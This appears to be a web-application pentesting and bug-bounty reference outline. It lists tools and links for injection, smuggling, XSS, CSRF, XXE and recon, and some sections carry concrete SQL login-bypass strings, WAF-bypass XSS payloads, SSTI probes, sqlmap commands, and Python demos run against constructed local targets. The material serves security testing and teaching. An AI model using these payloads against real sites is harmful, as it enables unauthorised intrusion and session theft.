1. Response manipulation
1.1. References
1.1.1. Ref 1
2. Reporting Tool
2.1. Serpico
2.2. dradisframework
2.3. bountyplz
2.4. template-generator
9. Unrestricted file upload
3.1. Tools
3.1.1. fuxploider
3.1.2. Burp extensions
3.1.2.1. Upload Scanner
3.2. Blogs
3.2.1. Blog 1
3.2.2. Blog 2
3.3. Payloads
3.3.1. Set 1
3.3.2. Set 2
3.3.3. Set 3
4. CRLF Injection (%0d%0a)
4.1. Payloads
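Added example (not from the page, and not any real product's code): a redirect handler that copies a user-supplied path into the Location header, beside one that refuses CR/LF, with a parser showing what a browser or proxy sees. The payload and the response format are constructed for the demo; a doubled %0d%0a would end the header section entirely and let the attacker supply the body (response splitting).

```python
from urllib.parse import unquote

# Constructed payload: %0d%0a is CR LF; once the server URL-decodes it, the
# injected text starts a new header line inside the response.
PAYLOAD = "/home%0d%0aSet-Cookie:%20sessionid=attacker-controlled"


def build_redirect_vulnerable(target: str) -> bytes:
    """Reflects the value verbatim: a CR LF inside it terminates the Location line early."""
    return (b"HTTP/1.1 302 Found\r\n"
            b"Location: " + target.encode("latin-1") + b"\r\n"
            b"Content-Length: 0\r\n"
            b"\r\n")


def build_redirect_safe(target: str) -> bytes:
    """Rejects control characters before they can reach the header section."""
    if any(ch in target for ch in "\r\n\x00"):
        raise ValueError("control character in header value")
    return build_redirect_vulnerable(target)


def parse_response_headers(raw: bytes) -> dict:
    """Client view: every CRLF-separated line before the blank line is a header."""
    head, _, body = raw.partition(b"\r\n\r\n")
    status, *lines = head.split(b"\r\n")
    headers = {}
    for line in lines:
        name, _, value = line.partition(b":")
        headers[name.strip().lower()] = value.strip()
    return {"status": status, "headers": headers, "body": body}


def demo() -> dict:
    """Run the payload through both builders and report what the client would accept."""
    decoded = unquote(PAYLOAD)
    vulnerable = parse_response_headers(build_redirect_vulnerable(decoded))
    try:
        build_redirect_safe(decoded)
        safe_rejected = False
    except ValueError:
        safe_rejected = True
    return {
        "location": vulnerable["headers"].get(b"location"),
        "injected_cookie": vulnerable["headers"].get(b"set-cookie"),
        "safe_rejected": safe_rejected,
    }


if __name__ == "__main__":
    print(demo())
```

Most current HTTP libraries already refuse CR/LF in header values (Python's http.client raises ValueError), so the bug survives mainly in hand-rolled servers, proxies and legacy frameworks; test the actual stack rather than assuming.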
5. HTTP request smuggling
5.1. Blogs
5.1.1. Blog 1
5.1.2. Blog 2
5.1.3. Blog 3
5.1.4. Blog 4
5.2. Concept
5.2.1. CL.TE (front-end honours Content-Length, back-end honours Transfer-Encoding)
5.2.2. TE.CL (front-end honours Transfer-Encoding, back-end honours Content-Length)
5.2.3. TE.TE (both honour Transfer-Encoding; one is tricked into ignoring an obfuscated TE header and falls back to Content-Length)
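Added example (not from the page, and not from smuggler.py or any other tool listed here): two constructed requests parsed once by a Content-Length-only reader and once by a chunked-only reader, showing what each treats as the body and what it leaves on the connection for the next request. That leftover is the desync that CL.TE and TE.CL exploit. RFC 7230 says Transfer-Encoding overrides Content-Length when both are present, which is exactly why two hops that disagree are dangerous.

```python
def split_request(raw: bytes):
    """Split a raw HTTP/1.1 request into (request line, lower-cased header dict, bytes after the blank line)."""
    head, _, rest = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, rest


def body_by_content_length(headers: dict, rest: bytes):
    """A CL-only parser: take exactly Content-Length bytes, leave the remainder on the socket."""
    length = int(headers.get(b"content-length", b"0"))
    return rest[:length], rest[length:]


def body_by_chunked(rest: bytes):
    """A TE-only parser: read hex-sized chunks until the zero-length terminator."""
    body = b""
    pos = 0
    while True:
        eol = rest.index(b"\r\n", pos)
        size = int(rest[pos:eol].split(b";")[0], 16)  # ignore chunk extensions
        pos = eol + 2
        if size == 0:
            # skip any trailer lines, then the empty line that ends the message
            while rest[pos:pos + 2] != b"\r\n":
                pos = rest.index(b"\r\n", pos) + 2
            pos += 2
            return body, rest[pos:]
        body += rest[pos:pos + size]
        pos += size + 2  # chunk data is followed by CRLF


def desync(raw: bytes) -> dict:
    """What each parser treats as the body, and what it leaves queued for the *next* request."""
    _, headers, rest = split_request(raw)
    cl_body, cl_left = body_by_content_length(headers, rest)
    te_body, te_left = body_by_chunked(rest)
    return {"cl_body": cl_body, "cl_leftover": cl_left,
            "te_body": te_body, "te_leftover": te_left}


# Constructed CL.TE request: Content-Length covers all 13 bytes ("0\r\n\r\nSMUGGLED"),
# but a chunked parser stops at the "0" chunk and leaves "SMUGGLED" for the next request.
CL_TE = (b"POST / HTTP/1.1\r\n"
         b"Host: example.com\r\n"
         b"Content-Length: 13\r\n"
         b"Transfer-Encoding: chunked\r\n"
         b"\r\n"
         b"0\r\n"
         b"\r\n"
         b"SMUGGLED")

# Constructed TE.CL request: a chunked parser consumes the 8-byte chunk and the terminator,
# but a Content-Length parser takes only 3 bytes ("8\r\n") and leaves the rest queued.
TE_CL = (b"POST / HTTP/1.1\r\n"
         b"Host: example.com\r\n"
         b"Content-Length: 3\r\n"
         b"Transfer-Encoding: chunked\r\n"
         b"\r\n"
         b"8\r\n"
         b"SMUGGLED\r\n"
         b"0\r\n"
         b"\r\n")


if __name__ == "__main__":
    for name, req in (("CL.TE", CL_TE), ("TE.CL", TE_CL)):
        print(name, desync(req))
```

In a real attack the leftover bytes are a request prefix ("GET /admin HTTP/1.1\r\nFoo: ") rather than the marker string, so the next victim request on the same back-end connection is glued onto them.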
5.3. Tools
5.3.1. smuggler.py
5.4. Burp extensions
5.4.1. http-request-smuggler
6. Web cache poisoning
7. Web Cache Deception Attack
8. SQL Injection
8.1. Types
8.1.1. Union-based SQLi
8.1.2. Error-based SQLi
8.1.3. Blind SQLi
8.1.3.1. Boolean-based (content-based) Blind SQLi
8.1.3.2. Time-based Blind SQLi
8.1.4. Second-order SQL injection
8.1.4.1. Terminate the injected statement and comment out the rest of the original query with "#" (MySQL) or "-- " (MySQL needs the trailing space)
8.1.5. Login SQLi
8.1.5.1. Login bypass payloads
8.1.5.1.1. SQL Query
    1) SELECT * FROM users WHERE name='tom' and password='tom'
    2) SELECT * FROM users WHERE name='tom' and password='' or '1'='1'
    3) SELECT * FROM users WHERE name='tom' and password='' or 1='1'
    4) SELECT * FROM users WHERE name='tom' and password='' or 1=1-- -'
    5) SELECT * FROM users WHERE name='' or '1'='1' and password='' or '1'='1'
    6) SELECT * FROM users WHERE name='' or ' 1=1' and password='' or ' 1=1'
    7) SELECT * FROM users WHERE name='1' or 1=1 -- -' and password='blah'
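Added example (not from the page): the login payloads above, reconstructed as the name/password field values that produce queries 2 to 7, run against a constructed in-memory SQLite table through the concatenating query and through the same query with bound parameters. Payload 3 (`1='1'`) relies on the engine coercing the string to a number; MySQL does that, SQLite's comparison rules do not, so it doubles as a dialect probe. The table contents and credentials are invented for the demo.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed users table: two accounts, neither with an empty password."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("tom", "s3cret"), ("alice", "hunter2")])
    return conn


def login_vulnerable(conn, name: str, password: str) -> list:
    """The query from the list above, built by concatenation: input becomes SQL grammar."""
    query = "SELECT name FROM users WHERE name='%s' and password='%s'" % (name, password)
    return sorted(row[0] for row in conn.execute(query))


def login_safe(conn, name: str, password: str) -> list:
    """Same query with bound parameters: quotes in the input are just characters."""
    query = "SELECT name FROM users WHERE name=? and password=?"
    return sorted(row[0] for row in conn.execute(query, (name, password)))


# Payloads 2-7 from the list above, as the (name, password) fields that produce them.
BYPASS_PAYLOADS = {
    2: ("tom", "' or '1'='1"),
    3: ("tom", "' or 1='1"),
    4: ("tom", "' or 1=1-- -"),
    5: ("' or '1'='1", "' or '1'='1"),
    6: ("' or ' 1=1", "' or ' 1=1"),
    7: ("1' or 1=1 -- -", "blah"),
}


def run_all() -> dict:
    """For each payload: the rows the concatenating login and the parameterised login return."""
    conn = make_db()
    results = {}
    for number, (name, password) in BYPASS_PAYLOADS.items():
        results[number] = {
            "vulnerable": login_vulnerable(conn, name, password),
            "safe": login_safe(conn, name, password),
        }
    return results


if __name__ == "__main__":
    for number, outcome in run_all().items():
        print(number, outcome)
```

Payloads 2, 4, 5 and 7 return every user from the vulnerable query because the tautology or the comment defeats the password check; the parameterised version returns nothing for all of them. When a payload does nothing, check the dialect's comment syntax and type coercion before concluding the target is not injectable.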
8.2. Tools& extensions
8.2.1. Online tools
8.2.1.1. sql-injection-scanner-online
8.2.2. Offline tools
8.2.2.1. SQLmap
8.2.2.1.1. Basic usage: sqlmap.py -u "http://xyz.com/vuln.php?id=1*" (the * marks the injection point; quote the URL so the shell does not expand it)
8.2.2.1.2. Adv usage: sqlmap.py -u "http://xyz.com/vuln.php?id=1*" --level 3 --risk 3
8.2.2.2. NoSQLMap
8.3. References
8.3.1. sqlwiki
8.3.2. pentest-tools
9. Cross-site scripting (XSS)
9.1. Types
9.1.1. Stored-XSS
9.1.2. Reflected-XSS
9.1.3. DOM-XSS
9.1.4. Blind-XSS
9.1.4.1. XSS Hunter (The Best tool for Blind XSS)
9.1.4.2. ezXSS (Has 2FA, email reports, share reports feature)
9.1.4.3. bXSS (Has slack/SMS notification feature)
9.1.4.4. Knoxss (has email feature & plugin)
9.1.4.5. Burp Collaborator
9.2. Payloads
9.2.1. WAF Bypass
9.2.1.1. Kona WAF (Akamai) Bypass
9.2.1.1.1. \');confirm(1);//
9.2.1.2. ModSecurity WAF Bypass
9.2.1.2.1. <img src=x onerror=prompt(document.cookie) onerror=prompt(document.domain) onerror=prompt(document.domain)>
9.2.1.3. Incapsula WAF Bypasses
9.2.1.3.1. <iframe/onload='this["src"]="javas cript:al"+"ert""';>
9.2.1.3.2. <img/src=q onerror='new Function`al\ert\`1\"'>
9.2.1.4. Wordfence XSS Bypasses
9.2.1.4.1. <meter onmouseover="alert(1)"
9.2.1.4.2. '">><div><meter onmouseover="alert(1)"</div>"
9.2.1.4.3. >><marquee loop=1 width=0 onfinish=alert(1)>
9.2.2. XSS via file upload
9.2.2.1. XSS in file name
9.2.2.1.1. "><img src=v onerror=prompt(xss);>.jpeg
9.2.2.2. Metadata (exiftool)
9.2.2.2.1. exiftool -Artist=' "><img src=1 onerror=alert(document.domain)>' brute.jpeg
9.2.2.3. SVG content XSS
9.2.2.3.1. <svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.domain)"/>
9.2.2.4. Gif extension XSS
9.2.2.4.1. GIF89a/*<svg/onload=alert(1)>*/=alert(document.domain)//;
9.2.2.5. Html extension
9.2.2.5.1. <!DOCTYPE html> <html> <head> <title>XSS</title> </head> <body> <script type="text/javascript">alert(document.cookie)</script> <script>prompt(1);</script> </body> </html>
9.2.3. Set 1
10. Command Injection
10.1. Payloads
10.1.1. Set 1
10.1.2. Set 2
10.2. Tools
10.2.1. commix
10.2.2. Practice labs
10.3. Burp Extensions
10.3.1. Command Injection Attacker
11. Template Injection
11.1. Tools
11.1.1. tplmap
11.2. Types
11.2.1. Twig
11.2.1.1. Payload: {{7*'7'}} (Twig renders 49)
11.2.2. Jinja
11.2.2.1. Payload: {{7*'7'}} (Jinja2 renders 7777777, which is how the two engines are told apart)
11.2.3. Ruby
11.2.3.1. Payload: <%= 7 * 7 %> (ERB renders 49)
11.3. Payloads & References
11.3.1. Set 1
11.3.2. Blog 1
12. Clickjacking
12.1. Tools and burp extensions
12.1.1. Clickbandit
13. Insecure Deserialization
13.1. Blogs
13.1.1. Blog 1
13.1.2. Blog 2
13.1.3. Blog 3
13.1.4. Blog 4
13.2. Tools
13.2.1. Python pickle
13.2.2. gadgetinspector
13.2.3. ysoserial
13.3. Burp Extensions
13.3.1. Java-Deserialization-Scanner
13.3.2. JavaSerialKiller
13.3.3. burp-ysoserial
13.3.4. SuperSerial
13.3.5. SuperSerial-Active
14. Git Recon
14.1. Tools
14.1.1. gitGraber
14.1.2. Gitrob
14.1.3. truffleHog
14.1.4. github-search
15. Race Condition
15.1. Blog 1
15.2. Blog 2
15.3. Blog 3
15.4. Blog 4
16. Google dorks
16.1. References
16.1.1. GHDB
16.1.2. Bugbounty dorks
16.1.3. Blog 1
16.1.4. Blog 2
16.1.5. google_Dorks_list
17. Subdomain enumeration & takeover
17.1. Blogs
17.1.1. POC
17.1.1.1. Subdomain take-over PoCs
    github - https://hackerone.com/reports/363778
    aws - https://hackerone.com/reports/186766
    zendesk - https://hackerone.com/reports/759454
    Azure - https://hackerone.com/reports/665398
    Uptime Robot - https://hackerone.com/reports/781614
    fly.io - https://hackerone.com/reports/576857
    icn.bg - https://hackerone.com/hacker_dashboard/overview
    Azure Traffic Manager - https://hackerone.com/reports/570651
    tilda.cc - https://hackerone.com/reports/720992
    Netlify - https://hackerone.com/reports/197489
    Mashery service - https://hackerone.com/reports/275714
    fastly - https://hackerone.com/reports/154425
    Heroku - https://hackerone.com/reports/365853
    UnbouncePages - https://hackerone.com/reports/209004
    Tumblr - https://hackerone.com/reports/221631
    Shopify - https://hackerone.com/reports/416474
    ghost.io - https://hackerone.com/reports/368119
    CloudFront (CF Origin) - https://hackerone.com/reports/145224
    legacy - https://hackerone.com/reports/389783
    WordPress - https://hackerone.com/reports/274336
    Desk - https://hackerone.com/reports/201796
17.1.2. Edoverflow
17.1.3. patrik
17.2. Tools
17.2.1. Online tools
17.2.1.1. Cyberint
17.2.1.2. Hackking
17.2.1.3. Sub enumeration
17.2.1.4. Virustotal
17.2.2. Offline tools
17.2.2.1. Amass
17.2.2.1.1. Basic-usage: [amass enum -d example.com]
17.2.2.2. Aquatone
17.2.2.2.1. Basic-usage: [cat targets.txt | aquatone {or} type targets.txt | aquatone]
17.2.2.3. Massdns
17.2.2.3.1. Basic-usage: [./bin/massdns {options} {domainlist}]
17.2.2.4. Findomain
17.2.2.4.1. Basic-usage: [findomain -t example.com]
17.2.2.5. assetfinder
17.2.3. Automation
17.2.3.1. Link 1
17.2.3.2. Link 2
18. Email spoofing vulnerabilities
18.1. Mxtoolbox
18.2. Mail spoofer
19. Directory enumeration
19.1. Wordlist
19.1.1. jhaddix
19.1.2. SecLists
19.2. Tools
19.2.1. Meg
19.2.2. ffuf
19.2.2.1. Basic-usage: [ffuf -w /path/to/wordlist -u https://target/FUZZ]
19.2.2.1.1. Examples
    Fuzz file paths from wordlist.txt, match all responses but filter out those with content-size 42. Colored, verbose output.
        ffuf -w wordlist.txt -u https://example.org/FUZZ -mc all -fs 42 -c -v
    Fuzz Host-header, match HTTP 200 responses.
        ffuf -w hosts.txt -u https://example.org/ -H "Host: FUZZ" -mc 200
    Fuzz POST JSON data. Match all responses not containing text "error".
        ffuf -w entries.txt -u https://example.org/ -X POST -H "Content-Type: application/json" \
             -d '{"name": "FUZZ", "anotherkey": "anothervalue"}' -fr "error"
    Fuzz multiple locations. Match only responses reflecting the value of "VAL" keyword. Colored.
        ffuf -w params.txt:PARAM -w values.txt:VAL -u https://example.org/?PARAM=VAL -mr "VAL" -c
19.2.3. Dirsearch
19.2.3.1. Basic-usage: [python3 dirsearch.py -u <URL> -e <EXTENSION>]
19.2.3.1.1. Options
    -h, --help                              show this help message and exit
    Mandatory:
      -u URL, --url=URL                     URL target
      -L URLLIST, --url-list=URLLIST        URL list target
      -e EXTENSIONS, --extensions=EXTENSIONS
                                            Extension list separated by comma (Example: php,asp)
      -E, --extensions-list                 Use predefined list of common extensions
    Dictionary Settings:
      -w WORDLIST, --wordlist=WORDLIST
      -l, --lowercase
      -f, --force-extensions                Force extensions for every wordlist entry (like in DirBuster)
    General Settings:
      -s DELAY, --delay=DELAY               Delay between requests (float number)
      -r, --recursive                       Bruteforce recursively
      -R RECURSIVE_LEVEL_MAX, --recursive-level-max=RECURSIVE_LEVEL_MAX
                                            Max recursion level (subdirs) (Default: 1 [only rootdir + 1 dir])
      --suppress-empty
      --scan-subdir=SCANSUBDIRS, --scan-subdirs=SCANSUBDIRS
                                            Scan subdirectories of the given -u|--url (separated by comma)
      --exclude-subdir=EXCLUDESUBDIRS, --exclude-subdirs=EXCLUDESUBDIRS
                                            Exclude the following subdirectories during recursive scan (separated by comma)
      -t THREADSCOUNT, --threads=THREADSCOUNT
                                            Number of Threads
      -x EXCLUDESTATUSCODES, --exclude-status=EXCLUDESTATUSCODES
                                            Exclude status code, separated by comma (example: 301, 500)
      --exclude-texts=EXCLUDETEXTS          Exclude responses by texts, separated by comma (example: "Not found", "Error")
      --exclude-regexps=EXCLUDEREGEXPS      Exclude responses by regexps, separated by comma (example: "Not foun[a-z]{1}", "^Error$")
      -c COOKIE, --cookie=COOKIE
      --ua=USERAGENT, --user-agent=USERAGENT
      -F, --follow-redirects
      -H HEADERS, --header=HEADERS          Headers to add (example: --header "Referer: example.com" --header "User-Agent: IE")
      --random-agents, --random-user-agents
    Connection Settings:
      --timeout=TIMEOUT                     Connection timeout
      --ip=IP                               Resolve name to IP address
      --proxy=HTTPPROXY, --http-proxy=HTTPPROXY
                                            Http Proxy (example: localhost:8080)
      --http-method=HTTPMETHOD              Method to use, default: GET, possible also: HEAD;POST
      --max-retries=MAXRETRIES
      -b, --request-by-hostname             By default dirsearch will request by IP for speed. This forces requests by hostname
    Reports:
      --simple-report=SIMPLEOUTPUTFILE      Only found paths
      --plain-text-report=PLAINTEXTOUTPUTFILE
                                            Found paths with status codes
      --json-report=JSONOUTPUTFILE
19.2.4. wfuzz
20. SAML/SSO
20.1. Blogs
20.1.1. Links
    https://epi052.gitlab.io/notes-to-self/blog/2019-03-07-how-to-test-saml-a-methodology/
    https://epi052.gitlab.io/notes-to-self/blog/2019-03-13-how-to-test-saml-a-methodology-part-two/
    https://epi052.gitlab.io/notes-to-self/blog/2019-03-16-how-to-test-saml-a-methodology-part-three/
    https://github.com/kelbyludwig/saml-attack-surface
    http://secretsofappsecurity.blogspot.com/2017/01/saml-security-xml-external-entity-attack.html
    https://seanmelia.wordpress.com/2016/01/09/xxe-via-saml/
    https://hackerone.com/reports/136169
20.2. Burp Extensions
20.2.1. SAMLRaider
21. SSRF
21.1. Online tools
21.1.1. ssrftest
21.1.2. postb.in
21.2. Github tools
21.2.1. httprebind
21.2.2. ssrftest
21.2.3. Ground control
21.2.4. SSRF map
21.3. Blogs & Payloads
21.3.1. Links
    https://github.com/jdonsec/AllThingsSSRF
    https://gist.github.com/jhaddix/78cece26c91c6263653f31ba453e273b
    https://medium.com/@madrobot/ssrf-server-side-request-forgery-types-and-ways-to-exploit-it-part-1-29d034c27978
    https://medium.com/@madrobot/ssrf-server-side-request-forgery-types-and-ways-to-exploit-it-part-2-a085ec4332c0
22. CSRF
22.1. CSRF Bypass
22.1.1. Replacing value of same length
22.1.2. Removing the CSRF token from requests entirely
22.1.3. Decoding CSRF tokens
22.1.4. Extracting token via HTML injection
22.1.5. Using only the static parts of the token
22.1.6. Changing request method
22.1.7. Try to remove the referer header
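Added example (not from the page, and not the EasyCSRF extension's code): the token-handling bypasses from the list above, generated from one baseline request and replayed against a deliberately weak validator and a strict one. The request, session token and both validators are constructed for the demo; "Decoding CSRF tokens" and "Extracting token via HTML injection" are not modelled because they depend on the target's token format and page.

```python
import secrets
from dataclasses import dataclass, replace


@dataclass(frozen=True)
class Request:
    method: str
    params: dict
    headers: dict


# Constructed: the token bound to the victim's session, and a state-changing request carrying it.
SESSION_TOKEN = "a1b2c3d4e5f60718"
BASELINE = Request(
    method="POST",
    params={"email": "attacker@example.com", "csrf_token": SESSION_TOKEN},
    headers={"Referer": "https://app.example.com/settings"},
)


def with_params(req: Request, **changes) -> Request:
    """Copy the request with parameters changed; a value of None deletes the key."""
    params = dict(req.params)
    for key, value in changes.items():
        if value is None:
            params.pop(key, None)
        else:
            params[key] = value
    return replace(req, params=params)


def bypass_variants(req: Request):
    """One mutated request per bypass from the list above."""
    token = req.params.get("csrf_token", "")
    yield "same-length replacement", with_params(req, csrf_token="A" * len(token))
    yield "token removed", with_params(req, csrf_token=None)
    yield "static half of token only", with_params(req, csrf_token=token[: len(token) // 2])
    yield "method changed to GET", replace(req, method="GET")
    yield "Referer removed", replace(req, headers={k: v for k, v in req.headers.items() if k != "Referer"})


def weak_validate(req: Request, session_token: str) -> bool:
    """Flaws seen in the wild: GET is trusted, a missing token skips the check, only length is compared."""
    if req.method == "GET":
        return True
    token = req.params.get("csrf_token")
    if token is None:
        return True
    return len(token) == len(session_token)


def strict_validate(req: Request, session_token: str) -> bool:
    """State changes only over POST, token required, constant-time exact comparison."""
    if req.method != "POST":
        return False
    token = req.params.get("csrf_token")
    return token is not None and secrets.compare_digest(token, session_token)


def evaluate(validator, req: Request = BASELINE, session_token: str = SESSION_TOKEN) -> dict:
    """Map each bypass name to whether the validator accepted the mutated request."""
    return {name: validator(variant, session_token) for name, variant in bypass_variants(req)}


if __name__ == "__main__":
    print("weak  :", evaluate(weak_validate))
    print("strict:", evaluate(strict_validate))
```

Against the strict validator only the "Referer removed" variant is still accepted, and that is correct: the token check does not depend on Referer. That variant matters only where the application relies on Referer or Origin checking instead of (or in addition to) a token.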
22.2. Burp extension
22.2.1. EasyCSRF
22.3. JSON-Based CSRF
22.3.1. Blog 1
23. File Inclusion
23.1. RFI
23.2. LFI
23.3. GitHub References & Tools
23.3.1. LFISuite
23.3.2. liffy
23.3.3. fimap
23.4. Payloads
23.4.1. Set 1
23.4.2. Set 2
23.4.3. Set 3
23.4.4. Burp Intruder list
24. IDOR
24.1. Burp Extensions
24.1.1. Authz
24.1.2. AuthMatrix
24.1.3. Authorize
24.2. Blogs
24.2.1. Blog 1
24.2.2. Blog 2
24.2.3. Blog 3
25. XXE
25.1. Online tools
25.1.1. XXE.SH
25.2. Types
25.2.1. In-band XXE (entity content is returned in the response)
25.2.2. Out-of-band (OOB) XXE (data exfiltrated via an external DTD to an attacker host)
25.2.3. Error-based XXE (file content leaked through parser error messages)
25.3. Github tools
25.3.1. oxml_xxe
25.3.2. XXEinjector
25.4. Blogs
25.4.1. Links
    https://0xatul.me/posts/2020/02/external-xml-entity-via-file-upload-svg/
    https://mahmoudsec.blogspot.com/2019/08/exploiting-out-of-band-xxe-using.html
    https://github.com/setuid0-sec/Swiss_E-Voting_Publications/blob/master/xxe_setuid0.pdf
    https://mohemiv.com/all/exploiting-xxe-with-local-dtd-files/
    https://honoki.net/2018/12/12/from-blind-xxe-to-root-level-file-read-access/
    https://www.corben.io/XSS-to-XXE-in-Prince/
    https://medium.com/@zain.sabahat/an-interesting-xxe-in-sap-8b35fec6ef33
26. Some Git repos, Burp extensions, etc.
26.1. Git repos
26.1.1. AWS offensive/defensive
26.1.2. Key hacks
26.1.3. Github Monitoring
26.1.4. Pentest-tools
26.2. Shodan monitoring
26.3. Burp extensions
26.3.1. HUNT
26.4. Blogs
26.4.1. pentester.land
27. Redirect
27.1. Online tools
27.1.1. Hackking
27.2. Blogs
27.2.1. Blog 1